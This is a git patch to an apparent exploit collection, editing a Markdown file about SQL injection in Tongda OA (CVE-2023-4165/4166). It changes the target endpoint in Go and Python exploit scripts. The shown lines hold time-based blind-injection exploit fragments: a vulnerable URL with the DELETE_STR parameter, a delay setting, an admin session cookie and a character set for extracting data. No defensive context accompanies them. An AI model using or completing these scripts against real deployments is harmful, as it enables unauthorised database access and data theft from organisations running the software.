From 96128a6dfcf764500b8d5c09a8c0a58bbee12152 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 4 Nov 2023 22:26:08 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E9=80=9A=E8=BE=BEOA=20sql=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E=20CVE-2023-4166.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 通达OA sql注入漏洞 CVE-2023-4166.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/通达OA sql注入漏洞 CVE-2023-4166.md b/通达OA sql注入漏洞 CVE-2023-4166.md index 0d72818..26076d2 100644 --- a/通达OA sql注入漏洞 CVE-2023-4166.md +++ b/通达OA sql注入漏洞 CVE-2023-4166.md @@ -36,7 +36,7 @@ import ( // 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞 func main() { // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1 general/system/seal_manage/dianju/delete_log.php - url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php" // 目标网站的URL + url := "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php" // 目标网站的URL delay := 2 // 延迟时间,单位为秒 cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值 @@ -106,7 +106,7 @@ headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-" -url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=" +url = "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=" result = ""